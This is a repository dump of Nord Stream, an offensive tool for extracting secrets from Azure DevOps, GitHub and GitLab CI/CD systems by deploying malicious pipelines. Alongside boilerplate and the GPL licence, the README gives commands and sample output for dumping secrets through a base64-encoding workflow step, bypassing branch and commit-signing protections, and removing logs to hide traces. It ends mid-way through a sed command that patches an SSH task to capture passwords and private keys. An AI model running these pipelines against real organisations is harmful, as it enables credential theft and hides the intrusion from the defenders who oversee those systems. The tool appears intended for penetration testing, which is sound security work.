Repository: synacktiv/nord-stream Branch: main Commit: 7c96209da201 Files: 32 Total size: 282.7 KB Directory structure: gitextract_yz6qr87i/ ├── .github/ │ └── ISSUE_TEMPLATE/ │ ├── bug_report.md │ └── feature_request.md ├── .gitignore ├── .pre-commit-config.yaml ├── CONTRIBUTING.md ├── LICENSE ├── README.md ├── nordstream/ │ ├── __main__.py │ ├── cicd/ │ │ ├── devops.py │ │ ├── github.py │ │ └── gitlab.py │ ├── commands/ │ │ ├── devops.py │ │ ├── github.py │ │ └── gitlab.py │ ├── core/ │ │ ├── devops/ │ │ │ └── devops.py │ │ ├── github/ │ │ │ ├── display.py │ │ │ ├── github.py │ │ │ └── protections.py │ │ └── gitlab/ │ │ └── gitlab.py │ ├── git.py │ ├── utils/ │ │ ├── constants.py │ │ ├── devops.py │ │ ├── errors.py │ │ ├── helpers.py │ │ └── log.py │ └── yaml/ │ ├── custom.py │ ├── devops.py │ ├── generator.py │ ├── github.py │ └── gitlab.py ├── pyproject.toml └── requirements.txt ================================================ FILE CONTENTS ================================================ ================================================ FILE: .github/ISSUE_TEMPLATE/bug_report.md ================================================ --- name: Bug report about: Create a report to help us improve title: "[BUG]" labels: bug assignees: hugo-syn --- **Describe the bug** A clear and concise description of what the bug is. **To Reproduce** Add information that could help us to reproduce the bug like: - privileges of the Token - scope of the Token - protections on a branch or environment - Output of the tool with the `--debug` options (Don't forget to strip your secrets) **Screenshots** If applicable, add screenshots to help explain your problem. **Additional context** Add any other context about the problem here. ================================================ FILE: .github/ISSUE_TEMPLATE/feature_request.md ================================================ --- name: Feature request about: Suggest an idea for this project title: "[FEAT]" labels: enhancement assignees: hugo-syn --- **Is your feature request related to a problem? Please describe.** A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] **Describe the solution you'd like** A clear and concise description of what you want to happen. **Additional context** Add any other context or screenshots about the feature request here. This can include specific configuration of the SCM or CI/CD system to help us implement the feature. ================================================ FILE: .gitignore ================================================ # Byte-compiled / optimized / DLL files __pycache__/ *.py[cod] *$py.class build/ #custom nord-stream-logs/ notes.md .vscode ================================================ FILE: .pre-commit-config.yaml ================================================ repos: - repo: https://github.com/pre-commit/pre-commit-hooks rev: v6.0.0 hooks: - id: check-added-large-files - id: check-case-conflict - id: check-executables-have-shebangs - id: check-merge-conflict - id: check-shebang-scripts-are-executable - id: end-of-file-fixer - id: fix-byte-order-marker - id: mixed-line-ending args: - --fix=no - id: trailing-whitespace args: - --markdown-linebreak-ext=md - repo: https://github.com/psf/black rev: 26.1.0 hooks: - id: black language_version: python3 args: - --line-length=120 - repo: https://github.com/compilerla/conventional-pre-commit rev: v4.4.0 hooks: - id: conventional-pre-commit stages: [commit-msg] args: [build, chore, ci, docs, feat, fix, perf, refactor, revert, style, test] ================================================ FILE: CONTRIBUTING.md ================================================ # Contributing rules - Install [`pre-commit`](https://pre-commit.com/). - Enable `pre-commit` hooks in the repository folder: `pre-commit install && pre-commit install --hook-type commit-msg`. These hooks automatically format the code and check the format of the commit message. - The format of commit messages must follow the [Conventional Commits](https://www.conventionalcommits.org/en/v1.0.0/) convention. ================================================ FILE: LICENSE ================================================ GNU GENERAL PUBLIC LICENSE Version 3, 29 June 2007 Copyright (C) 2007 Free Software Foundation, Inc. Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The GNU General Public License is a free, copyleft license for software and other kinds of works. The licenses for most software and other practical works are designed to take away your freedom to share and change the works. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change all versions of a program--to make sure it remains free software for all its users. We, the Free Software Foundation, use the GNU General Public License for most of our software; it applies also to any other work released this way by its authors. You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for them if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs, and that you know you can do these things. To protect your rights, we need to prevent others from denying you these rights or asking you to surrender the rights. Therefore, you have certain responsibilities if you distribute copies of the software, or if you modify it: responsibilities to respect the freedom of others. For example, if you distribute copies of such a program, whether gratis or for a fee, you must pass on to the recipients the same freedoms that you received. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. Developers that use the GNU GPL protect your rights with two steps: (1) assert copyright on the software, and (2) offer you this License giving you legal permission to copy, distribute and/or modify it. For the developers' and authors' protection, the GPL clearly explains that there is no warranty for this free software. For both users' and authors' sake, the GPL requires that modified versions be marked as changed, so that their problems will not be attributed erroneously to authors of previous versions. Some devices are designed to deny users access to install or run modified versions of the software inside them, although the manufacturer can do so. This is fundamentally incompatible with the aim of protecting users' freedom to change the software. The systematic pattern of such abuse occurs in the area of products for individuals to use, which is precisely where it is most unacceptable. Therefore, we have designed this version of the GPL to prohibit the practice for those products. If such problems arise substantially in other domains, we stand ready to extend this provision to those domains in future versions of the GPL, as needed to protect the freedom of users. Finally, every program is threatened constantly by software patents. States should not allow patents to restrict development and use of software on general-purpose computers, but in those that do, we wish to avoid the special danger that patents applied to a free program could make it effectively proprietary. To prevent this, the GPL assures that patents cannot be used to render the program non-free. The precise terms and conditions for copying, distribution and modification follow. TERMS AND CONDITIONS 0. Definitions. "This License" refers to version 3 of the GNU General Public License. "Copyright" also means copyright-like laws that apply to other kinds of works, such as semiconductor masks. "The Program" refers to any copyrightable work licensed under this License. Each licensee is addressed as "you". "Licensees" and "recipients" may be individuals or organizations. To "modify" a work means to copy from or adapt all or part of the work in a fashion requiring copyright permission, other than the making of an exact copy. The resulting work is called a "modified version" of the earlier work or a work "based on" the earlier work. A "covered work" means either the unmodified Program or a work based on the Program. To "propagate" a work means to do anything with it that, without permission, would make you directly or secondarily liable for infringement under applicable copyright law, except executing it on a computer or modifying a private copy. Propagation includes copying, distribution (with or without modification), making available to the public, and in some countries other activities as well. To "convey" a work means any kind of propagation that enables other parties to make or receive copies. Mere interaction with a user through a computer network, with no transfer of a copy, is not conveying. An interactive user interface displays "Appropriate Legal Notices" to the extent that it includes a convenient and prominently visible feature that (1) displays an appropriate copyright notice, and (2) tells the user that there is no warranty for the work (except to the extent that warranties are provided), that licensees may convey the work under this License, and how to view a copy of this License. If the interface presents a list of user commands or options, such as a menu, a prominent item in the list meets this criterion. 1. Source Code. The "source code" for a work means the preferred form of the work for making modifications to it. "Object code" means any non-source form of a work. A "Standard Interface" means an interface that either is an official standard defined by a recognized standards body, or, in the case of interfaces specified for a particular programming language, one that is widely used among developers working in that language. The "System Libraries" of an executable work include anything, other than the work as a whole, that (a) is included in the normal form of packaging a Major Component, but which is not part of that Major Component, and (b) serves only to enable use of the work with that Major Component, or to implement a Standard Interface for which an implementation is available to the public in source code form. A "Major Component", in this context, means a major essential component (kernel, window system, and so on) of the specific operating system (if any) on which the executable work runs, or a compiler used to produce the work, or an object code interpreter used to run it. The "Corresponding Source" for a work in object code form means all the source code needed to generate, install, and (for an executable work) run the object code and to modify the work, including scripts to control those activities. However, it does not include the work's System Libraries, or general-purpose tools or generally available free programs which are used unmodified in performing those activities but which are not part of the work. For example, Corresponding Source includes interface definition files associated with source files for the work, and the source code for shared libraries and dynamically linked subprograms that the work is specifically designed to require, such as by intimate data communication or control flow between those subprograms and other parts of the work. The Corresponding Source need not include anything that users can regenerate automatically from other parts of the Corresponding Source. The Corresponding Source for a work in source code form is that same work. 2. Basic Permissions. All rights granted under this License are granted for the term of copyright on the Program, and are irrevocable provided the stated conditions are met. This License explicitly affirms your unlimited permission to run the unmodified Program. The output from running a covered work is covered by this License only if the output, given its content, constitutes a covered work. This License acknowledges your rights of fair use or other equivalent, as provided by copyright law. You may make, run and propagate covered works that you do not convey, without conditions so long as your license otherwise remains in force. You may convey covered works to others for the sole purpose of having them make modifications exclusively for you, or provide you with facilities for running those works, provided that you comply with the terms of this License in conveying all material for which you do not control copyright. Those thus making or running the covered works for you must do so exclusively on your behalf, under your direction and control, on terms that prohibit them from making any copies of your copyrighted material outside their relationship with you. Conveying under any other circumstances is permitted solely under the conditions stated below. Sublicensing is not allowed; section 10 makes it unnecessary. 3. Protecting Users' Legal Rights From Anti-Circumvention Law. No covered work shall be deemed part of an effective technological measure under any applicable law fulfilling obligations under article 11 of the WIPO copyright treaty adopted on 20 December 1996, or similar laws prohibiting or restricting circumvention of such measures. When you convey a covered work, you waive any legal power to forbid circumvention of technological measures to the extent such circumvention is effected by exercising rights under this License with respect to the covered work, and you disclaim any intention to limit operation or modification of the work as a means of enforcing, against the work's users, your or third parties' legal rights to forbid circumvention of technological measures. 4. Conveying Verbatim Copies. You may convey verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice; keep intact all notices stating that this License and any non-permissive terms added in accord with section 7 apply to the code; keep intact all notices of the absence of any warranty; and give all recipients a copy of this License along with the Program. You may charge any price or no price for each copy that you convey, and you may offer support or warranty protection for a fee. 5. Conveying Modified Source Versions. You may convey a work based on the Program, or the modifications to produce it from the Program, in the form of source code under the terms of section 4, provided that you also meet all of these conditions: a) The work must carry prominent notices stating that you modified it, and giving a relevant date. b) The work must carry prominent notices stating that it is released under this License and any conditions added under section 7. This requirement modifies the requirement in section 4 to "keep intact all notices". c) You must license the entire work, as a whole, under this License to anyone who comes into possession of a copy. This License will therefore apply, along with any applicable section 7 additional terms, to the whole of the work, and all its parts, regardless of how they are packaged. This License gives no permission to license the work in any other way, but it does not invalidate such permission if you have separately received it. d) If the work has interactive user interfaces, each must display Appropriate Legal Notices; however, if the Program has interactive interfaces that do not display Appropriate Legal Notices, your work need not make them do so. A compilation of a covered work with other separate and independent works, which are not by their nature extensions of the covered work, and which are not combined with it such as to form a larger program, in or on a volume of a storage or distribution medium, is called an "aggregate" if the compilation and its resulting copyright are not used to limit the access or legal rights of the compilation's users beyond what the individual works permit. Inclusion of a covered work in an aggregate does not cause this License to apply to the other parts of the aggregate. 6. Conveying Non-Source Forms. You may convey a covered work in object code form under the terms of sections 4 and 5, provided that you also convey the machine-readable Corresponding Source under the terms of this License, in one of these ways: a) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by the Corresponding Source fixed on a durable physical medium customarily used for software interchange. b) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by a written offer, valid for at least three years and valid for as long as you offer spare parts or customer support for that product model, to give anyone who possesses the object code either (1) a copy of the Corresponding Source for all the software in the product that is covered by this License, on a durable physical medium customarily used for software interchange, for a price no more than your reasonable cost of physically performing this conveying of source, or (2) access to copy the Corresponding Source from a network server at no charge. c) Convey individual copies of the object code with a copy of the written offer to provide the Corresponding Source. This alternative is allowed only occasionally and noncommercially, and only if you received the object code with such an offer, in accord with subsection 6b. d) Convey the object code by offering access from a designated place (gratis or for a charge), and offer equivalent access to the Corresponding Source in the same way through the same place at no further charge. You need not require recipients to copy the Corresponding Source along with the object code. If the place to copy the object code is a network server, the Corresponding Source may be on a different server (operated by you or a third party) that supports equivalent copying facilities, provided you maintain clear directions next to the object code saying where to find the Corresponding Source. Regardless of what server hosts the Corresponding Source, you remain obligated to ensure that it is available for as long as needed to satisfy these requirements. e) Convey the object code using peer-to-peer transmission, provided you inform other peers where the object code and Corresponding Source of the work are being offered to the general public at no charge under subsection 6d. A separable portion of the object code, whose source code is excluded from the Corresponding Source as a System Library, need not be included in conveying the object code work. A "User Product" is either (1) a "consumer product", which means any tangible personal property which is normally used for personal, family, or household purposes, or (2) anything designed or sold for incorporation into a dwelling. In determining whether a product is a consumer product, doubtful cases shall be resolved in favor of coverage. For a particular product received by a particular user, "normally used" refers to a typical or common use of that class of product, regardless of the status of the particular user or of the way in which the particular user actually uses, or expects or is expected to use, the product. A product is a consumer product regardless of whether the product has substantial commercial, industrial or non-consumer uses, unless such uses represent the only significant mode of use of the product. "Installation Information" for a User Product means any methods, procedures, authorization keys, or other information required to install and execute modified versions of a covered work in that User Product from a modified version of its Corresponding Source. The information must suffice to ensure that the continued functioning of the modified object code is in no case prevented or interfered with solely because modification has been made. If you convey an object code work under this section in, or with, or specifically for use in, a User Product, and the conveying occurs as part of a transaction in which the right of possession and use of the User Product is transferred to the recipient in perpetuity or for a fixed term (regardless of how the transaction is characterized), the Corresponding Source conveyed under this section must be accompanied by the Installation Information. But this requirement does not apply if neither you nor any third party retains the ability to install modified object code on the User Product (for example, the work has been installed in ROM). The requirement to provide Installation Information does not include a requirement to continue to provide support service, warranty, or updates for a work that has been modified or installed by the recipient, or for the User Product in which it has been modified or installed. Access to a network may be denied when the modification itself materially and adversely affects the operation of the network or violates the rules and protocols for communication across the network. Corresponding Source conveyed, and Installation Information provided, in accord with this section must be in a format that is publicly documented (and with an implementation available to the public in source code form), and must require no special password or key for unpacking, reading or copying. 7. Additional Terms. "Additional permissions" are terms that supplement the terms of this License by making exceptions from one or more of its conditions. Additional permissions that are applicable to the entire Program shall be treated as though they were included in this License, to the extent that they are valid under applicable law. If additional permissions apply only to part of the Program, that part may be used separately under those permissions, but the entire Program remains governed by this License without regard to the additional permissions. When you convey a copy of a covered work, you may at your option remove any additional permissions from that copy, or from any part of it. (Additional permissions may be written to require their own removal in certain cases when you modify the work.) You may place additional permissions on material, added by you to a covered work, for which you have or can give appropriate copyright permission. Notwithstanding any other provision of this License, for material you add to a covered work, you may (if authorized by the copyright holders of that material) supplement the terms of this License with terms: a) Disclaiming warranty or limiting liability differently from the terms of sections 15 and 16 of this License; or b) Requiring preservation of specified reasonable legal notices or author attributions in that material or in the Appropriate Legal Notices displayed by works containing it; or c) Prohibiting misrepresentation of the origin of that material, or requiring that modified versions of such material be marked in reasonable ways as different from the original version; or d) Limiting the use for publicity purposes of names of licensors or authors of the material; or e) Declining to grant rights under trademark law for use of some trade names, trademarks, or service marks; or f) Requiring indemnification of licensors and authors of that material by anyone who conveys the material (or modified versions of it) with contractual assumptions of liability to the recipient, for any liability that these contractual assumptions directly impose on those licensors and authors. All other non-permissive additional terms are considered "further restrictions" within the meaning of section 10. If the Program as you received it, or any part of it, contains a notice stating that it is governed by this License along with a term that is a further restriction, you may remove that term. If a license document contains a further restriction but permits relicensing or conveying under this License, you may add to a covered work material governed by the terms of that license document, provided that the further restriction does not survive such relicensing or conveying. If you add terms to a covered work in accord with this section, you must place, in the relevant source files, a statement of the additional terms that apply to those files, or a notice indicating where to find the applicable terms. Additional terms, permissive or non-permissive, may be stated in the form of a separately written license, or stated as exceptions; the above requirements apply either way. 8. Termination. You may not propagate or modify a covered work except as expressly provided under this License. Any attempt otherwise to propagate or modify it is void, and will automatically terminate your rights under this License (including any patent licenses granted under the third paragraph of section 11). However, if you cease all violation of this License, then your license from a particular copyright holder is reinstated (a) provisionally, unless and until the copyright holder explicitly and finally terminates your license, and (b) permanently, if the copyright holder fails to notify you of the violation by some reasonable means prior to 60 days after the cessation. Moreover, your license from a particular copyright holder is reinstated permanently if the copyright holder notifies you of the violation by some reasonable means, this is the first time you have received notice of violation of this License (for any work) from that copyright holder, and you cure the violation prior to 30 days after your receipt of the notice. Termination of your rights under this section does not terminate the licenses of parties who have received copies or rights from you under this License. If your rights have been terminated and not permanently reinstated, you do not qualify to receive new licenses for the same material under section 10. 9. Acceptance Not Required for Having Copies. You are not required to accept this License in order to receive or run a copy of the Program. Ancillary propagation of a covered work occurring solely as a consequence of using peer-to-peer transmission to receive a copy likewise does not require acceptance. However, nothing other than this License grants you permission to propagate or modify any covered work. These actions infringe copyright if you do not accept this License. Therefore, by modifying or propagating a covered work, you indicate your acceptance of this License to do so. 10. Automatic Licensing of Downstream Recipients. Each time you convey a covered work, the recipient automatically receives a license from the original licensors, to run, modify and propagate that work, subject to this License. You are not responsible for enforcing compliance by third parties with this License. An "entity transaction" is a transaction transferring control of an organization, or substantially all assets of one, or subdividing an organization, or merging organizations. If propagation of a covered work results from an entity transaction, each party to that transaction who receives a copy of the work also receives whatever licenses to the work the party's predecessor in interest had or could give under the previous paragraph, plus a right to possession of the Corresponding Source of the work from the predecessor in interest, if the predecessor has it or can get it with reasonable efforts. You may not impose any further restrictions on the exercise of the rights granted or affirmed under this License. For example, you may not impose a license fee, royalty, or other charge for exercise of rights granted under this License, and you may not initiate litigation (including a cross-claim or counterclaim in a lawsuit) alleging that any patent claim is infringed by making, using, selling, offering for sale, or importing the Program or any portion of it. 11. Patents. A "contributor" is a copyright holder who authorizes use under this License of the Program or a work on which the Program is based. The work thus licensed is called the contributor's "contributor version". A contributor's "essential patent claims" are all patent claims owned or controlled by the contributor, whether already acquired or hereafter acquired, that would be infringed by some manner, permitted by this License, of making, using, or selling its contributor version, but do not include claims that would be infringed only as a consequence of further modification of the contributor version. For purposes of this definition, "control" includes the right to grant patent sublicenses in a manner consistent with the requirements of this License. Each contributor grants you a non-exclusive, worldwide, royalty-free patent license under the contributor's essential patent claims, to make, use, sell, offer for sale, import and otherwise run, modify and propagate the contents of its contributor version. In the following three paragraphs, a "patent license" is any express agreement or commitment, however denominated, not to enforce a patent (such as an express permission to practice a patent or covenant not to sue for patent infringement). To "grant" such a patent license to a party means to make such an agreement or commitment not to enforce a patent against the party. If you convey a covered work, knowingly relying on a patent license, and the Corresponding Source of the work is not available for anyone to copy, free of charge and under the terms of this License, through a publicly available network server or other readily accessible means, then you must either (1) cause the Corresponding Source to be so available, or (2) arrange to deprive yourself of the benefit of the patent license for this particular work, or (3) arrange, in a manner consistent with the requirements of this License, to extend the patent license to downstream recipients. "Knowingly relying" means you have actual knowledge that, but for the patent license, your conveying the covered work in a country, or your recipient's use of the covered work in a country, would infringe one or more identifiable patents in that country that you have reason to believe are valid. If, pursuant to or in connection with a single transaction or arrangement, you convey, or propagate by procuring conveyance of, a covered work, and grant a patent license to some of the parties receiving the covered work authorizing them to use, propagate, modify or convey a specific copy of the covered work, then the patent license you grant is automatically extended to all recipients of the covered work and works based on it. A patent license is "discriminatory" if it does not include within the scope of its coverage, prohibits the exercise of, or is conditioned on the non-exercise of one or more of the rights that are specifically granted under this License. You may not convey a covered work if you are a party to an arrangement with a third party that is in the business of distributing software, under which you make payment to the third party based on the extent of your activity of conveying the work, and under which the third party grants, to any of the parties who would receive the covered work from you, a discriminatory patent license (a) in connection with copies of the covered work conveyed by you (or copies made from those copies), or (b) primarily for and in connection with specific products or compilations that contain the covered work, unless you entered into that arrangement, or that patent license was granted, prior to 28 March 2007. Nothing in this License shall be construed as excluding or limiting any implied license or other defenses to infringement that may otherwise be available to you under applicable patent law. 12. No Surrender of Others' Freedom. If conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot convey a covered work so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not convey it at all. For example, if you agree to terms that obligate you to collect a royalty for further conveying from those to whom you convey the Program, the only way you could satisfy both those terms and this License would be to refrain entirely from conveying the Program. 13. Use with the GNU Affero General Public License. Notwithstanding any other provision of this License, you have permission to link or combine any covered work with a work licensed under version 3 of the GNU Affero General Public License into a single combined work, and to convey the resulting work. The terms of this License will continue to apply to the part which is the covered work, but the special requirements of the GNU Affero General Public License, section 13, concerning interaction through a network will apply to the combination as such. 14. Revised Versions of this License. The Free Software Foundation may publish revised and/or new versions of the GNU General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies that a certain numbered version of the GNU General Public License "or any later version" applies to it, you have the option of following the terms and conditions either of that numbered version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of the GNU General Public License, you may choose any version ever published by the Free Software Foundation. If the Program specifies that a proxy can decide which future versions of the GNU General Public License can be used, that proxy's public statement of acceptance of a version permanently authorizes you to choose that version for the Program. Later license versions may give you additional or different permissions. However, no additional obligations are imposed on any author or copyright holder as a result of your choosing to follow a later version. 15. Disclaimer of Warranty. THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 16. Limitation of Liability. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. 17. Interpretation of Sections 15 and 16. If the disclaimer of warranty and limitation of liability provided above cannot be given local legal effect according to their terms, reviewing courts shall apply local law that most closely approximates an absolute waiver of all civil liability in connection with the Program, unless a warranty or assumption of liability accompanies a copy of the Program in return for a fee. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively state the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. Copyright (C) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . Also add information on how to contact you by electronic and paper mail. If the program does terminal interaction, make it output a short notice like this when it starts in an interactive mode: Copyright (C) This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, your program's commands might be different; for a GUI interface, you would use an "about box". You should also get your employer (if you work as a programmer) or school, if any, to sign a "copyright disclaimer" for the program, if necessary. For more information on this, and how to apply and follow the GNU GPL, see . The GNU General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License. But first, please read . ================================================ FILE: README.md ================================================ # Nord Stream Nord Stream is a tool that allows you extract secrets stored inside CI/CD environments by deploying _malicious_ pipelines. It currently supports Azure DevOps, GitHub and GitLab. Find out more in the following blogpost: https://www.synacktiv.com/publications/cicd-secrets-extraction-tips-and-tricks ## Table of Contents - [Nord Stream](#nord-stream) - [Table of Contents](#table-of-contents) - [Installation](#installation) - [Usage](#usage) - [Shared arguments](#shared-arguments) - [Describe token](#describe-token) - [Build YAML](#build-yaml) - [YAML](#yaml) - [Clean logs](#clean-logs) - [Signing commits](#signing-commits) - [Azure DevOps](#azure-devops) - [Service connections](#service-connections) - [SSH](#ssh) - [Listing orgs](#listing-orgs) - [Help](#help) - [GitHub](#github) - [List protections](#list-protections) - [Disable protections](#disable-protections) - [Force](#force) - [Azure OIDC](#azure-oidc) - [AWS OIDC](#aws-oidc) - [Help](#help-1) - [GitLab](#gitlab) - [List secrets](#list-secrets) - [YAML](#yaml-1) - [List protections](#list-protections-1) - [Help](#help-2) - [TODO](#todo) - [Contact](#contact) ## Installation ``` $ pipx install git+https://github.com/synacktiv/nord-stream ``` `git` is also required (see https://git-scm.com/download/) and must exist in your `PATH`. ## Usage Here is a simple example on GitHub; initially, one can enumerate the various secrets. ```sh $ nord-stream github --token "$GHP" --org org --list-secrets --repo repo [*] Listing secrets: [*] "org/repo" secrets [*] Repo secrets: - REPO_SECRET - SUPER_SECRET [*] PROD secrets: - PROD_SECRET ``` Then proceed to the exfiltration: ```sh $ nord-stream github --token "$GHP" --org org --repo repo [+] "org/repo" [*] No branch protection rule found on "dev_remote_ea5Eu/test/v1" branch [*] Getting secrets from repo: "org/repo" [*] Getting workflow output [!] Workflow not finished, sleeping for 15s [+] Workflow has successfully terminated. [+] Secrets: secret_SUPER_SECRET=value for super secret secret_REPO_SECRET=repository secret [*] Getting secrets from environment: "PROD" (org/repo) [*] Getting workflow output [!] Workflow not finished, sleeping for 15s [+] Workflow has successfully terminated. [+] Secrets: secret_PROD_SECRET=Value only accessible from prod environment [*] Cleaning logs. [*] Check output: /home/hugov/Documents/pentest/RD/CICD/tools/nord-stream/nord-stream/nord-stream-logs/github ``` ### Shared arguments Some arguments are shared between [GitHub](#github), [Azure DevOps](#azure-devops) and [GitLab](#gitlab) here are some examples. #### Describe token The `--describe-token` option can be used to display general information about your token: ```bash $ nord-stream github --token "$PAT" --describe-token [*] Token information: - Login: CICD - IsAdmin: False - Id: 1337 - Bio: None ``` #### Build YAML The `--build-yaml` option can be used to create a pipeline file without deploying it. It retrieves the various secret names to build the associated pipeline, which can be used to add custom steps: ```bash $ nord-stream github --token "$PAT" --org Synacktiv --repo repo --env PROD --build-yaml custom.yml [+] YAML file: name: GitHub Actions 'on': push jobs: init: runs-on: ubuntu-latest steps: - run: env -0 | awk -v RS='\0' '/^secret_/ {print $0}' | base64 -w0 | base64 -w0 name: command env: secret_PROD_SECRET: ${{secrets.PROD_SECRET}} environment: PROD ``` #### YAML The `--yaml` option can be used to deploy a custom pipeline: ```yml name: GitHub Actions 'on': push jobs: init: runs-on: ubuntu-latest steps: - run: echo "Hello from step 1" name: step 1 - run: echo "Doing some important stuff here" name: command - run: echo "Hello from last step " name: last step ``` ```bash $ nord-stream github --token "$PAT" --org Synacktiv --repo repo --yaml custom.yml [+] "synacktiv/repo" [*] No branch protection rule found on "dev_remote_ea5Eu/test/v1"branch [*] Running custom workflow: .../custom.yml [*] Getting workflow output [!] Workflow not finished, sleeping for 15s [+] Workflow has successfully terminated. [+] Workflow output: 2023-07-18T20:08:33.0073670Z ##[group]Run echo "Doing some important stuff here" 2023-07-18T20:08:33.0074247Z echo "Doing some important stuff here" 2023-07-18T20:08:33.0136846Z shell: /usr/bin/bash -e {0} 2023-07-18T20:08:33.0137261Z ##[endgroup] 2023-07-18T20:08:33.0422019Z Doing some important stuff here [*] Cleaning logs. [*] Check output: .../nord-stream-logs/github ``` By default, it will display the output of the task named `command` of the `init` job, but everything is stored locally and can be access manually: ```bash $ cat nord-stream-logs/github/synacktiv/repo/workflow_custom_2023-07-18_22-08-44/init/4_last\ step.txt 2023-07-18T20:08:33.0458509Z ##[group]Run echo "Hello from last step " 2023-07-18T20:08:33.0459084Z echo "Hello from last step " 2023-07-18T20:08:33.0511473Z shell: /usr/bin/bash -e {0} 2023-07-18T20:08:33.0511890Z ##[endgroup] 2023-07-18T20:08:33.0597853Z Hello from last step ``` #### Clean logs By default, Nord Stream will attempt to remove traces left after a pipeline deployment, depending on your privileges. To preserve traces, the `--no-clean` option can be used. This will keep the pipeline logs, but this will still revert the changes made to the repository. Note that for GitLab, some traces cannot be deleted. #### Signing commits Repository administrators can enforce required commit signing on a branch to block all commits that are not signed and verified. With Nord Stream it's possible to sign commit to bypass such protection. First create an import your GPG key on the SCM platform. ```sh $ gpg --full-generate-key $ gpg --armor --export F94496913C43EFC5 $ gpg --list-secret-keys --keyid-format=long sec dsa2048/F94496913C43EFC5 2023-07-18 [SC] [expires: 2023-07-23] Key fingerprint = B158 3F43 9899 C5A3 B74E D04B F944 9691 3C43 EFC5 uid [ultimate] test-gpg ``` ```bash $ nord-stream github --token "$PAT" --org Synacktiv --repo repo --branch-name main --key-id F94496913C43EFC5 --user test-gpg --email test.gpg@cicd.local --force [*] Using branch: "main" [+] "synacktiv/repo" [*] Getting secrets from environment: "prod" (synacktiv/repo) [*] Getting workflow output [!] Workflow not finished, sleeping for 15s [+] Workflow has successfully terminated. [+] Secrets: secret_PROD_SECRET=my PROD_SECRET ``` ```bash $ git verify-commit 00dcd856624bc9a41f8bd70662f0650839730973 gpg: Signature made Tue 18 Jul 2023 10:34:18 PM CEST gpg: using DSA key B1583F439899C5A3B74ED04BF94496913C43EFC5 gpg: Good signature from "test-gpg " [ultimate] Primary key fingerprint: B158 3F43 9899 C5A3 B74E D04B F944 9691 3C43 EFC5 ``` ### Azure DevOps Nord Stream can extract the following types of secrets: - Variable groups (vg) - Secure files (sf) - Service connections #### Service connections Azure DevOps offers the possibility to create connections with external and remote services for executing tasks in a job. To do so, service connections are used. A service connection holds credentials for an identity to a remote service. There are multiple types of service connections in Azure DevOps. Nord Stream currently support secret extraction for the following types of service connection: - AzureRM - GitHub - AWS - SonarQube - SSH If you come across a non-supported type, please open an issue or make a pull request :) ##### SSH The extraction for this service connection type was painfull to implement. The output is the following: ``` hostname:::port:::user:::password:::privatekey ``` If you want to run it on a self-hosted runner you can do the following: ``` $ nord-stream devops ... --build-yaml test.yml --build-type ssh [+] YAML file: trigger: none pool: vmImage: ubuntu-latest steps: - checkout: none - script: SSH_FILE=$(find /home/vsts/work/_tasks/ -name ssh.js) ; cp $SSH_FILE $SSH_FILE.bak ; sed -i 's|const readyTimeout = getReadyTimeoutVariable();|const readyTimeout = getReadyTimeoutVariable();\nconst fs = require("fs");var data = "";data += hostname + ":::" + port + ":::" + username + ":::" + password 